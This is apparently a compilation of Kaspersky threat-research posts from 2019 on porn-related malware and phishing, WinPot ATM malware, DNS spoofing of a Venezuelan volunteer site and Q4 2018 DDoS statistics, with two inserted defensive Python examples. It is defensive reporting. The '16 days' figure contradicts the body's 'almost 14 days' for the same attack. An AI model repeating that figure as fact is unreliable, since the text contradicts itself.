| HEUR:Trojan-Ransom.AndroidOS.Small.cj | 1.29% | not-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx | 0.36% |
| not-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx | 1.07% | HEUR:Trojan-Ransom.AndroidOS.Small.cj | 0.36% |

Top-10 verdicts that represent porn-related categories, by the number of attacked mobile users, in 2017 and 2018. Source: Kaspersky Security Network

These threats are typically distributed through affiliate programs focused on earning money as a result of users installing applications and clicking on an advertisement. As well as AdWare, pornography is also used to distribute ransomware (4% in 2018) but on a much smaller scale compared to 2017, when more than 10% of users faced such malicious programs. This decline is most likely a reflection of the overall downward trend for ransomware seen in the malware landscape.

Credential hunters

A specific type of malware related to pornography, which we have been tracking throughout the year, is implemented by so-called credential hunters. We track them with the help of our botnet-tracking technology, which monitors active botnets and receives intelligence on what kind of activities they perform, to prevent emerging threats.

We particularly track botnets that are made of malware. Upon installation on a PC, this malware can monitor which web pages are opened, or create a fake one where the user enters their login and password credentials. Usually such programs are made for stealing money from online banking accounts, but last year we were surprised to discover that there are bots in these botnets that hunt for credentials to pornography websites.

Based on the data we were able to collect, in 2017 there were 27 variations of bots, belonging to three families of banking Trojans, attempting to steal credentials (Betabot, Neverquest and Panda). These Trojans were after credentials to accounts for 10 famous adult content websites (Brazzers, Chaturbate, Pornhub, Myfreecams, Youporn, Wilshing, Motherless, XNXX, X-videos). During 2017, these bots attempted to infect more than 50,000 users over 307,000 times.

In 2018, the number of attacked users doubled, reaching more than 110,000 PCs across the world. The number of attacks almost tripled, to 850,000 infection attempts. At the same time, the number of variations of malware we were able to spot fell from 27 to 22, but the number of families increased from three to five, meaning that pornography credentials are considered valuable to ever more cybercriminals.

Another important shift that happened in 2018 was that malware families do not hunt for credentials to multiple websites. Instead, they focus on just two: mostly Pornhub and XNXX, whose users were targeted by bots belonging to the Jimmy malware family.

Apparently Pornhub remains popular, not only to regular users of the web, but also to cybercriminals looking for another way of gaining illegal profits by selling user credentials.

Part 2 – Phishing and spam

Our previous research suggested that it is relatively rare to see pornography as a topic of interest in phishing scams. Instead, criminals prefer to exploit popular sites dedicated to finding sex partners. But in 2018, our anti-phishing technologies started blocking phishing pages that resemble popular pornography websites.

These are generally pages disguised as pornhub.com, youporn.com, xhamster.com, and xvideos.com. In Q4, 2017, the overall number of attempts to access phishing pages pretending to be one of the listed websites was 1,608. Within a year, in Q4 2018, the number of such attempts (21,902) was more than ten times higher.

The overall number of attempts to visit phishing webpages pretending to be one of the popular adult-content resources was 38,305. Leading the list of accessed phishing pages were those that were disguised as a Pornhub page. There were 37,144 attempts to visit the phishing version of the website, while there were only 1,161 attempts to visit youporn.com, xhamster.com, and xvideos.com in total. These figures are still relatively low; other phishing categories may see detection results of millions of attempts per year. However, the fact that the number of detections on pornography pages is growing may mean that criminals are only just beginning to explore the topic.

It is worth mentioning that phishing pages cannot influence the original page in any way; they merely copy it. The authentic Pornhub page is not connected to the phishing. Moreover, most search engines usually successfully block such phishing pages, so the most likely way to access them is through phishing or spam e-mails, or by being redirected there by malware or a malicious frame on another website.

Fake versions of popular pornography websites target users’ credentials and contact details, which can later be either sold or used in other fraud schemes or cyberattacks. In general, credentials capture is one of the most popular ways to target users, using pornography to implement phishing fraud schemes. In such schemes, the victim is often lured to a phishing website disguised as a social network, where they are asked to authenticate their identity in order to watch an adult video which can only be accessed if the user confirms they are over 18 years old.

As the victim enters their password, the threat actor captures the credentials to the user’s social network account.

Pornographic content phishing can also be used to install malicious software. For example, to access an alleged adult video, the phishing page requires the user to download and update a video player.

Needless to say, instead of downloading a video player, the user downloads malware.

Sometimes phishing fraudsters target e-wallet credentials with the help of pornographic content. The victim is lured to the pornographic website to watch a video broadcast. In order to view the content, the user is asked to enter their payment credentials.

Spam-scam

We have rarely seen pornographic content used in any special or specific way when it comes to spam. Apart from the mass distribution of ‘standard’ advertising offering adult content on legitimate and illegal websites, this type of threat hasn’t been spotted using pornography in a creative way. However, there is one exception. Beginning in 2017, an infamous sextortion scam started to happen. Users started to receive messages containing an extortion letter with a demand to transfer bitcoins to fraudsters.

The scammers claimed to have personal messages and recordings of the victim watching porn. The letters even claimed that the threat actor could combine the video that the supposed victim was watching with what was recorded through their webcam. This extortion is based purely on making threats.

2018, however, saw an increase in the volume of such e-mails. Moreover, they became more sophisticated and were not only threatening the user, but also ‘proving’ the legitimacy of the scammers’ claims by providing the user with actual information about them.

In most cases, it was either a password, or a phone number, or a combination of both with an e-mail address. Since people tend to use the same passwords for different websites, the victim was often likely to believe that paired passwords and e-mail addresses found by the criminal on the dark web were authentic, even if they were not actually correct for the adult-content account in question.

Furthermore, these e-mails have been sent out in more languages than previously found.

In reality, these mailings were based purely on the assumption that the target of such e-mails would hand over their credentials and that these would become profitable. The number of such scams grew in 2018.

Part 3 – Darknet insights

One of the burning topics of the adult-content industry is the controversy surrounding paid subscriptions to access websites. It is often the case that users can register for pornography accounts through a ‘premium’ subscription model (that includes no advertisements and unlimited access to the adult website content). Otherwise, the website they want to access does not allow them to watch any free content at all unless they pay. At most, the user may see video previews for free but still be expected to make a payment to watch the full video. The opinions around such practice vary. Some people claim that money paid for porn “directly fuels the industry that supports the abuse, exploitation, and trafficking around the world”. Others argue that pornography is like most other commodities and people are willing to exchange money for it just as they would other kinds of entertainment, such as tv-series or music. Some though prefer to highlight examples of when adult content can result in people being denied their human rights.

Whether it is worth it or not, some users agree that the price of premium accounts to popular pornography websites is rather high. For example, monthly memberships can vary from $20 to $30, and annual unlimited access costs might scale from $120 to $150. This is where cybercriminals enter the fray.

The research on porn-related cyberthreats we did previously proved that there is a very well developed supply and demand chain for stolen credentials on the dark web. We conducted research on this issue again in 2018, analyzing 20 of the top-rated Tor marketplaces listed on DeepDotWeb – an open Tor site that contains a dynamic ranking of dark markets evaluated by Tor administrators based on customers’ feedback. All of them contained one to more than 3,000 offers for credentials to adult content websites. In total, 29 websites displayed more than 15,000 offers to buy one or more accounts to pornography websites (with, of course, no legal guarantees of delivering on their promise).

The results of the research conducted in the last year showed that four of the researched markets that offered the widest range of stolen credentials provided users with more than 5,239 unique offers. The figure for 2018 showed that their number doubled, accounting for more than 10,000 offers on sale.

The quantity of accounts available ranged from 1 to 30, with a few exceptions mostly from poorly rated sellers. However, the majority of offers promised to deliver credentials to only one account. Regardless of the type of account, the prices vary from $3 to $9 per offer, very rarely exceeding $10 – the same as back in 2017, with the vast majority of prices being limited to $6-$7 or the equal amount in bitcoins, which is 20 times cheaper than the most modest annual memberships. Getting access to an account illegally for a lower cost than a legal subscription is not the only appeal of buying such credentials on the dark web. There is the added appeal of anonymity, hiding behind other people’s credentials while watching pornography.

Conclusions and advice

Overall, the amount of downloadable malware disguised as pornography detected on users’ devices significantly decreased in 2018 in comparison with record activity in 2017. While at first glance this looks like good news, a worrying trend has appeared. The number of users being attacked with malware that hunts for their pornographic content credentials is on the rise and this means premium subscriptions are now a valuable asset for cybercriminals. There is also the fact that many modern pornography websites include social functionality, allowing people to share their own private content in different ways through the website. Some people make it freely available for all, some decide to limit who can see it. There has also been a significant rise in the number of cases where people suffer from sextortion. In other words, the sphere of adult-content may contain cybersecurity challenges other than the ‘classic’ infected pornography websites and video files armed with malware. These challenges should be addressed properly.

Another cybersecurity risk that adult content brings, which may be less obvious, is the misuse of corporate resources. As mentioned at the beginning of this report, the unsafe consumption of pornography from the workplace may result in the corporate network being hit by a massive infection. While most malicious attacks using pornography are aimed at consumers, not corporations, the fact that most consumers have a job to go to every day brings a certain risk for IT administrators responsible for securing corporate networks.

In order to consume and produce adult content safely, Kaspersky Lab advises the following:

For consumers:

  • Before clicking any link, check the link address shown, even in the search results of trusted search engines. If the address was received in an e-mail, check if it is the same as the actual hyperlink.
  • Do not click on questionable websites when they are offered in search results and do not install anything that comes from them.
  • If you wish to buy a paid subscription to an adult content website – purchase it only on the official website. Double check the URL of the website and make sure it is authentic.
  • Check any email attachments with a security solution before opening them – especially from dark web entities (even if they are expected to come from an anonymous source).
  • Patch the software on your PC as soon as security updates for the latest bugs are available.
  • Do not download pirated software and other illegal content, even if you were redirected to the webpage from a legitimate website.
  • Use a reliable security solution with behavior-based anti-phishing technologies – such as Kaspersky Total Security, to detect and block spam and phishing attacks.
  • Use a robust security solution to protect you from malicious software and its actions – such as the Kaspersky Internet Security for Android.

For businesses:

  • Educate employees in basic security hygiene, and explain the policies on accessing web sites potentially containing illegal or restricted content, as well as not opening emails or clicking on links from unknown sources.
  • Businesses can also block access to web sites that contravene corporate policy, such as porn sites, by using a dedicated endpoint solution such as Kaspersky Endpoint Security for Business. In addition to anti-spam and anti-phishing, it must include application and web controls, and web threat protection that can detect and block access to malicious or phishing web addresses.

February 19, 2019

ATM robber WinPot: a slot machine instead of cutlets

Automation of all kinds is there to help people with their routine work, making it faster and simpler. Although ATM fraud is a very peculiar sort of work, some cybercriminals put a lot of effort into automating it. In March 2018, we came across a fairly simple but effective piece of malware named WinPot. It was created to make ATMs from a popular ATM vendor automatically dispense all cash from their most valuable cassettes. We called it ATMPot.

Example of WinPot interface – dispensing in action

The criminals had clearly spent some time on the interface to make it look like that of a slot machine, likely as a reference to the popular term ATM-jackpotting, which refers to techniques designed to empty ATMs. In the WinPot case, each cassette has a reel of its own numbered 1 to 4 (4 is the max number of cash-out cassettes in an ATM) and a button labeled SPIN. As soon as you press the SPIN button (in our case it is greyed out because we are actually dispensing cash), the ATM starts dispensing cash from the corresponding cassette. Below the SPIN button there is information about the cassette (bank note value and the number of bank notes in the cassette). The SCAN button rescans the ATM and updates the numbers under the SLOT button, while the STOP button stops the dispensing in progress.

We found WinPot to be an amusing and interesting ATM malware family, so we decided to keep a close eye on it.

Over the course of time, new samples popped up, each one with minor modifications: for example, a changed packer (like Yoda and UPX) or an updated time period during which the malware was programmed to work (e.g., during March). If the system time does not fall within the preset period, WinPot silently stops operating without showing its interface.

The number of samples we had found was also reflected in the European Fraud Update published in the summer of 2018. It has a few lines about WinPot:

“ATM malware and logical security attacks were reported by nine countries. Five of the countries reported ATM related malware. In addition to Cutlet Maker (used for ATM cash-out) a new variant called WinPot has been reported…”

Like Cutlet Maker, WinPot is available on the (Dark)net for approximately 500 – 1000 USD, depending on the offer.

One of the sellers offers WinPot v.3 together with a demo video depicting the “new” malware version along with a still unidentified program with the caption “ShowMeMoney”. Its looks and mechanics seem quite similar to those of the Stimulator from the CutletMaker story.

Unidentified Stimulator-like sample from demo video

WinPot v3 sample from demo video

Due to the nature of ATM cash-out malware, its core functionality won’t change much. But criminals do encounter problems, so they invent modifications:

  • To trick the ATM security systems (using protectors or other ways to make each new sample unique);
  • To overcome potential ATM limitations (like maximum notes per dispense);
  • To find ways to keep the money mules from abusing their malware;
  • To improve the interface and error-handling routines.

We thus expect to see more modifications of the existing ATM malware. The preferred way of protecting the ATM from this sort of threat is to have device control and process whitelisting software running on it. The former will block the USB path of implanting the malware directly into the ATM PC, while the latter will prevent execution of unauthorized software on it. Kaspersky Embedded Systems Security will further help to improve the security level of the ATMs.

Kaspersky Lab products detect WinPot and its modifications as Backdoor.Win32.ATMPot.gen

Sample MD5:
821e593e80c598883433da88a5431e9d

February 13, 2019

DNS Manipulation in Venezuela in regards to the Humanitarian Aid Campaign

Venezuela is a country facing an uncertain moment in its history. Reports suggest it is in significant need of humanitarian aid.

On February 10th, Mr. Juan Guaidó made a public call asking for volunteers to join a new movement called “Voluntarios por Venezuela” (Volunteers for Venezuela). According to the media, it already numbers thousands of volunteers, willing to help international organizations to deliver humanitarian aid to the country. How does it work? Volunteers sign up and then receive instructions about how to help. The original website asks volunteers to provide their full name, personal ID, cell phone number, and whether they have a medical degree, a car, or a smartphone, and also the location of where they live:

This website appeared online on February 6th. Only a few days later, on February 11th, the day after the public announcement of the initiative, another almost identical website appeared with a very similar domain name and structure.

In fact, the false website is a mirror image of the original website, voluntariosxvenezuela.com

Both the original and the false website use SSL from Let’s Encrypt. The differences are as follows:

Original voluntariosxvenezuela.com website:

  • First day on the Internet: Feb 6th
  • Whois information: registered in the name of Sigerist Rodriguez on Feb 4, 2019
  • Hosted on Amazon Web Services

Deception website:

  • First day on the Internet: Feb 11th
  • Whois information: registered via GoDaddy using the Privacy Protection feature on Feb 11, 2019
  • Hosted first on GoDaddy and then on DigitalOcean

Now, the scariest part is that these two different domains with different owners are resolved within Venezuela to the same IP address, which belongs to the fake domain owner:

That means it does not matter whether a volunteer opens the legitimate domain name or the fake one: in the end, they will enter their personal information into a fake website.

Both domains if resolved outside Venezuela present different results:

Kaspersky Lab blocks the fake domain as phishing.

In this scenario, where the DNS servers are manipulated, it’s strongly recommended to use public DNS servers such as Google DNS servers (8.8.8.8 and 8.8.4.4) or CloudFlare and APNIC DNS servers (1.1.1.1 and 1.0.0.1). It’s also recommended to use VPN connections without a 3rd party DNS.
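A way to check for the symptom described above, comparing what the local resolver returns with what the public resolvers return. This is an added example, not code from the original report; `lookalike.example` stands in for the fake domain (which the report does not name), the resolver label `local-isp` is hypothetical, and all IP addresses in the sample are constructed from documentation ranges.

```python
"""Compare a local resolver's A records with reference resolvers (added example)."""
import secrets
import socket
import struct


def build_query(name, txid):
    """Encode a recursive DNS query for the A record of `name` (RFC 1035)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, one question
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def _skip_name(msg, off):
    """Return the offset just past a (possibly compressed) domain name."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if (length & 0xC0) == 0xC0:  # compression pointer is two bytes long
            return off + 2
        off += 1 + length


def parse_a_records(msg):
    """Return the set of IPv4 addresses in the answer section of a response."""
    _txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qdcount):
        off = _skip_name(msg, off) + 4  # skip QTYPE and QCLASS
    addrs = set()
    for _ in range(ancount):
        off = _skip_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:  # A record; CNAMEs are skipped
            addrs.add(socket.inet_ntoa(msg[off:off + 4]))
        off += rdlen
    return addrs


def resolve_via(resolver_ip, name, timeout=3.0):
    """Ask one specific resolver over UDP/53 (needs network access)."""
    txid = secrets.randbits(16)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(name, txid), (resolver_ip, 53))
        data, _ = sock.recvfrom(4096)
    if struct.unpack("!H", data[:2])[0] != txid:
        raise ValueError("transaction ID mismatch")
    return parse_a_records(data)


def find_anomalies(observations, local, references):
    """observations maps resolver -> {domain: set of IPs}.

    "mismatch":  the local answer shares no address with any reference answer.
                 CDNs can answer differently by region, so this is a lead only.
    "collapsed": unrelated domains share one IP locally but not at any reference
                 resolver, which is the pattern the report describes.
    """
    findings = []
    local_view = observations[local]
    for domain, local_ips in local_view.items():
        trusted = set().union(*(observations[r].get(domain, set()) for r in references))
        if trusted and local_ips and not (local_ips & trusted):
            findings.append(("mismatch", domain, sorted(local_ips)))
    by_ip = {}
    for domain, ips in local_view.items():
        for ip in ips:
            by_ip.setdefault(ip, set()).add(domain)
    for ip, domains in by_ip.items():
        if len(domains) < 2:
            continue
        shared_elsewhere = any(
            all(ip in observations[r].get(d, set()) for d in domains)
            for r in references
        )
        if not shared_elsewhere:
            findings.append(("collapsed", ip, sorted(domains)))
    return findings


LEGIT = "voluntariosxvenezuela.com"  # domain named in the report
LOOKALIKE = "lookalike.example"      # placeholder, the report does not name it
# Constructed observations; live ones would come from resolve_via().
SAMPLE = {
    "local-isp": {LEGIT: {"203.0.113.10"}, LOOKALIKE: {"203.0.113.10"}},
    "8.8.8.8": {LEGIT: {"192.0.2.20"}, LOOKALIKE: {"203.0.113.10"}},
    "1.1.1.1": {LEGIT: {"192.0.2.20"}, LOOKALIKE: {"203.0.113.10"}},
}

if __name__ == "__main__":
    for finding in find_anomalies(SAMPLE, "local-isp", ["8.8.8.8", "1.1.1.1"]):
        print(finding)
```

Plain UDP queries to a public resolver can themselves be intercepted on the same network, so reference answers are best collected from a vantage point outside it or over an encrypted transport.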

February 7, 2019

DDoS Attacks in Q4 2018

News overview

In Q4 2018, security researchers detected a number of new botnets, which, for a change, were not all Mirai clones. The fall saw increased activity on the part of the Chalubo bot, whose first attacks were registered in late August. Although the new malware employs snippets of Mirai code and the same persistence techniques as in the Xor.DDoS bot family, Chalubo is mostly a fresh product designed solely for DDoS attacks (for example, one of the detected samples was a SYN flood one). In October, Chalubo began to be seen more often in the wild; researchers detected versions created for different architectures (32- and 64-bit ARM, x86, x86_64, MIPS, MIPSEL, PowerPC), which strongly suggests that the test period is over.

Also in October, details were released of the new Torii botnet, which Avast experts detected a month earlier. The botnet is aimed at a wide range of IoT devices and architectures. Its code differs significantly from Mirai — the malware is better hidden with a higher level of persistence, and thus promises to be far more dangerous. The malware collects and sends detailed information about infected devices to its C&C server, including host name and process ID, but for what purpose remains unclear. No DDoS attacks based on Torii botnets were detected, but experts believe that it’s still early days.

Another bot from last quarter, nicknamed DemonBot, caught the eye for hijacking Hadoop clusters through a vulnerability in the execution of YARN remote commands. This bot is not very complex technically, but dangerous in its choice of target: Hadoop clusters pack a major punch in terms of computing power because they are designed to handle Big Data. What’s more, being cloud-integrated, they can significantly boost DDoS attacks. Radware is currently monitoring 70 active servers that carry out up to 1 million infections per day. DemonBot is compatible not only with Hadoop clusters, but with most IoT devices, which makes it easy to re-aim at more numerous targets.

Last quarter, experts warned not only about new botnets, but new attack mechanisms, too. At the beginning of winter, for instance, it turned out that FragmentSmack was more widely deployable than previously thought. This attack exploits a vulnerability in the IP stack, which enables defective packets to be sent disguised as fragments of a larger message. The resource under attack tries to gather these packets into one, or places them in an endless queue, which takes up all its computational power and renders it incapable of handling legitimate requests. FragmentSmack was believed to be a threat only to Linux systems, but in December researchers from Finland discovered that it works fine with Windows 7, 8.1, 10, Windows Server, and 90 Cisco products.

Another promising attack method uses the CoAP protocol approved for widespread application in 2014. It is designed to facilitate communication between devices with a small amount of memory, making it ideal for the IoT. Since CoAP is based on the UDP protocol, it has inherited all the latter’s defects, which means it can be harnessed to boost DDoS attacks. Until now, this has not been a significant problem; however, experts note that during the November 2017–November 2018 period, the number of devices using CoAP increased almost 100 times, which is a major cause for concern.

Alongside new potential means for staging attacks, late 2018 saw the arrival of a new DDoS launch platform, called 0x-booter. First discovered on October 17, 2018, the service can support attacks with a capacity of up to 420 Gb/s based on just over 16,000 bots infected with Bushido IoT malware, a modified version of Mirai. Borrowing code from this kindred service, the platform is dangerous for its simplicity, low cost, and relative power: For just $20–50, anyone can use the simple interface to launch one of several types of attack against a target. According to the researchers, in the second half of October alone the service was utilized in more than 300 DDoS attacks.

It was with such resources that a powerful DDoS campaign was carried out throughout October against Japanese video game publisher Square Enix. The first wave came at the start of the month, coinciding with an attack on their French colleagues from Ubisoft (seemingly timed for the release of Assassin’s Creed Odyssey on October 4). The second wave hit a couple of weeks later. The attacks cut users off from the service for up to 20 hours.

Other than that, the end of the year was marked less by high-profile DDoS attacks than by attempts to reduce their frequency. Based on a report by cybersecurity researchers, the US Council on Foreign Relations (CFR) called for a global initiative of both public and private organizations to reduce the number of botnets.

Nor are law enforcement agencies asleep at the wheel. In October, US citizen Austin Thompson was found guilty of organizing a number of DDoS attacks in 2013–14. His victims included video game streamers as well as major game developers EA, Sony, Microsoft, and others.

In early December, British teenager George Duke-Cohan, who organized DDoS attacks against IT blogger Brian Krebs, the DEF CON convention, and government organizations in several countries, was sentenced to three years in prison, though not as yet for these incidents but for making bomb hoax threats to numerous British schools and San Francisco Airport. Further charges could be brought against him in the US.

And around Christmas time, the FBI put a stop to 15 DDoS-as-a-Service sites, charging three suspects with running the platforms. The operation is of interest because many of the domains brought down had long escaped the eyes of the law by masquerading as stress testing sites. As the FBI uncovered, some of the services were complicit in a recent string of attacks on gaming portals.

Quarter and year trends

In 2018, we recorded 13% less DDoS activity than in the previous year. A drop in the number of attacks over this period was observed in each quarter, except the third, which outstripped Q3 2017 due to an anomalously active September. The biggest decrease was seen in Q4, with the number of attacks only 70% of the 2017 figure.

Quarterly comparison of the number of DDoS attacks defeated by Kaspersky DDoS Protection in 2017–2018 (100% = number of attacks in 2017)

The average duration of attacks in H2 grew steadily over the year: from 95 minutes in Q1 to 218 in Q4.

The most common type of attack by a wide margin is UDP flooding, as reflected in our reports for the last few quarters. However, when comparing attacks by their duration, the situation is quite different. First place goes to HTTP floods and mixed attacks with an HTTP element — they account for around 80% of all DDoS attack activity. Conversely, the UDP attacks we observed this year rarely lasted more than 5 minutes.

Distribution of attack duration by type, 2018

All this suggests that the market for unsophisticated, easy-to-organize attacks continues to shrink, as we predicted would happen. Standard DDoS attacks have been rendered almost pointless by improved anti-UDP flood protection, plus the fact that the technical resources involved are nearly always more profitably deployed for other purposes, such as cryptocurrency mining.

Many short attacks of this kind can be interpreted as simply testing the water (on the off-chance that the target is not secure). It only takes a few minutes for the cybercriminals to figure out that their tools are ineffective and call off the attack.

At the same time, more complex attacks such as HTTP floods, which require time and effort to arrange, remain popular, and their duration is on an upward curve.

These trends look set to develop further in 2019: the total number of attacks will fall amid growth in the duration, power, and impact of well-targeted offensives. A rise in professionalism is also in the cards. Given that most resources are totally unaffected by primitive attempts to disrupt their operation, DDoS attack organizers will have to raise their technical level, as their clients would seek out more professional implementers.

Statistics Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q4 2018.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.
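The counting rules above, applied to a handful of botnet activity periods. This is an added example, not Kaspersky's own tooling: the record layout, the botnet labels and the timestamps are constructed, and the boundary case is an assumption, since the text says both "does not exceed 24 hours" and "24 hours or more"; here a quiet interval of exactly 24 hours starts a new attack, as in the report's own worked sentence.

```python
"""Count DDoS attacks from botnet activity periods using a 24-hour gap rule."""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Attack = namedtuple("Attack", "botnet target start end")


def count_attacks(periods, gap=timedelta(hours=24)):
    """Merge activity periods into attacks.

    periods: iterable of (botnet, target_ip, start, end).
    Periods are merged only within the same (botnet, target) pair, because
    requests from different botnets against one resource count separately.
    Assumption: a quiet interval of exactly `gap` or more splits the attack.
    """
    grouped = defaultdict(list)
    for botnet, target, start, end in periods:
        if end < start:
            raise ValueError("activity period ends before it starts")
        grouped[(botnet, target)].append((start, end))

    attacks = []
    for (botnet, target), spans in grouped.items():
        spans.sort()
        cur_start, cur_end = spans[0]
        for start, end in spans[1:]:
            if start - cur_end < gap:
                # Quiet interval shorter than the threshold (or overlapping
                # periods): still the same attack.
                cur_end = max(cur_end, end)
            else:
                attacks.append(Attack(botnet, target, cur_start, cur_end))
                cur_start, cur_end = start, end
        attacks.append(Attack(botnet, target, cur_start, cur_end))
    return sorted(attacks, key=lambda a: (a.start, a.botnet, a.target))


def unique_targets(attacks):
    """Unique targets are counted by unique IP address, as in the report."""
    return len({a.target for a in attacks})


# Constructed activity periods (botnet, target IP, start, end).
SAMPLE_PERIODS = [
    # Same botnet and target, 21 h of silence: one attack.
    ("botnet-A", "198.51.100.7", datetime(2018, 10, 16, 0, 0), datetime(2018, 10, 16, 2, 0)),
    ("botnet-A", "198.51.100.7", datetime(2018, 10, 16, 20, 0), datetime(2018, 10, 16, 23, 0)),
    # 25 h of silence after the previous period: a second attack.
    ("botnet-A", "198.51.100.7", datetime(2018, 10, 18, 0, 0), datetime(2018, 10, 18, 1, 0)),
    # Different botnet against the same target: always a separate attack.
    ("botnet-B", "198.51.100.7", datetime(2018, 10, 16, 1, 0), datetime(2018, 10, 16, 3, 0)),
    # Exactly 24 h of silence: two attacks under the assumption above.
    ("botnet-A", "198.51.100.9", datetime(2018, 12, 4, 10, 0), datetime(2018, 12, 4, 10, 5)),
    ("botnet-A", "198.51.100.9", datetime(2018, 12, 5, 10, 5), datetime(2018, 12, 5, 10, 30)),
]

if __name__ == "__main__":
    found = count_attacks(SAMPLE_PERIODS)
    for attack in found:
        print(attack.botnet, attack.target, attack.start, "->", attack.end)
    print("attacks:", len(found), "unique targets:", unique_targets(found))
```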

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary

  • China still tops the leaderboard by number of DDoS attacks, but its share fell quite significantly, from 77.67% to 50.43%. The US retained second position (24.90%), and Australia came third (4.5%). The Top 10 waved goodbye to Russia and Singapore, but welcomed Brazil (2.89%) and Saudi Arabia (1.57%).
  • By geographical distribution of targets, the leaders remain China (43.26%), the US (29.14%), and Australia (5.91%). That said, China’s share fell significantly, while all other Top 10 countries increased theirs.
  • Most of the botnet-based attacks last quarter occurred in October; holiday and pre-holiday periods were calmer. In terms of weekly dynamics, attack activity rose mid-week and decreased towards the end.
  • Q4 witnessed the longest attack seen in recent years, lasting almost 16 days (329 hours). In general, the share of short attacks decreased slightly, but the fluctuations were minor.
  • The share of UDP floods increased significantly to almost a third (31.1%) of all attacks. However, SYN flooding is still leading (58.2%).
  • In connection with the rising number of Mirai C&C servers, the shares of the US (43.48%), Britain (7.88%), and the Netherlands (6.79%) increased.

Attack geography

In the last quarter of 2018, China still accounted for most DDoS attacks. However, its share was down by more than 20 p.p.: from 77.67% to 50.43%.

Meanwhile, the share of the US, which took second place, almost doubled to 24.90%. As in the previous quarter, bronze went to Australia. Its share also practically doubled: from 2.27% to 4.5%. Hong Kong’s share rose only slightly (from 1.74% to 1.84%), causing it to drop to sixth place, ceding fourth position to Brazil. The latter’s indicators had been quite modest up to now, but this quarter its share was 2.89%.

An unexpected newcomer in the ranking was Saudi Arabia, whose share climbed to 1.57%, good enough for seventh spot. This time, the Top 10 had no room for Russia and Singapore. South Korea, having ranked in the Top 3 for several years before dropping to 11th in Q3, not only failed to return to the Top 10, but fell even lower, nosediving to 25th.

The shares of the other top-tenners also increased compared with summer and early fall. The same applies to the total share of countries outside the Top 10 — it increased by more than 5 p.p., from 2.83% to 7.90%.

Distribution of DDoS attacks by country, Q3 and Q4 2018

The distribution of targets by country corresponds to the distribution pattern for number of attacks: China still leads, but its share fell by just over 27 p.p., from 70.58% to 43.26%. The US remains second, although its share grew from 17.05% to 29.14%. Third place again belongs to Australia, also with an increased share (5.9%).

Russia and South Korea, until recently considered Top 10 regulars, slipped well down — as in the rating by number of attacks, they finished 17th and 25th, respectively. They were replaced by new entrants Brazil (2.73%) in fourth place and Saudi Arabia (2.23%) in fifth. The shares of all other countries, as in the previous ranking, also rose slightly. Twofold growth was observed in the case of Canada (from 1.09% to 2.21%), whose results in the past few quarters have fluctuated around 1%, never exceeding 1.5%.

The share of the countries outside of Top 10 almost tripled: from 3.64% to 9.32%.

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2018

Dynamics of the number of DDoS attacks

Most of the attack peaks occurred at the start of the quarter (October), with another small surge of activity coming in early December. Unlike last year, there were no clear-cut spikes connected to the autumn and winter holidays, rather the opposite: post-festive periods were quieter. The stormiest days were October 16 and 18, and December 4; the calmest was December 27.

Dynamics of the number of DDoS attacks in Q4 2018

Whereas Q3 attacks were distributed relatively evenly over the days of the week, in Q4 the differences were more pronounced. The quietest day was Sunday (12.02% of attacks), the most active was Thursday: 15.74% of DDoS attacks occurred mid-week. Some correlation can be seen here with the distribution of attacks by date: both weekends and holidays in the previous quarter were calmer.

Distribution of DDoS attacks by day of the week, Q3 and Q4 2018

Duration and types of DDoS attacks

The longest Q4 attack we monitored lasted a near record-breaking 329 hours (almost 14 days); for a longer attack, we have to go back to late 2015. That is approximately 1.5 times the duration of the previous quarter’s longest attack of 239 hours (about 10 days).

The total share of attacks longer than 140 hours in the previous quarter increased only slightly (+0.01 p.p.) to 0.11%. The proportion of relatively long attacks (50–139 hours) also increased, from 0.59% to 1.15%. However, the most significant rise was observed in the category of 5–9 hour attacks: from 5.49% to 9.40%.

Accordingly, the share of short attacks less than 4 hours in duration decreased slightly, to 83.34%. For comparison, in Q3 they accounted for 86.94% of all attacks.

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2018

The distribution of attacks by type in the last quarter underwent a bit of a shakeup. SYN flooding remains the most common, but its share dropped from 83.20% to 58.20%. That allowed UDP flooding to increase its share to almost a third of all types of DDoS attacks (31.10%), up from the more modest 11.90% in Q3.

In third place was TCP flooding, whose share also rose — to 8.40%. The share of attacks via HTTP dropped to 2.20%. In last place again, with its share falling to 0.10%, was ICMP flooding.

Distribution of DDoS attacks by type, Q4 2018

The ratio of Windows and Linux botnets barely moved against Q3. The share of Linux botnets increased slightly, up to 97.11%. Accordingly, the share of Windows botnets dropped by the same margin (1.25 p.p.) to 2.89%.

Ratio of Windows/Linux botnet attacks, Q3 and Q4 2018

Botnet distribution geography

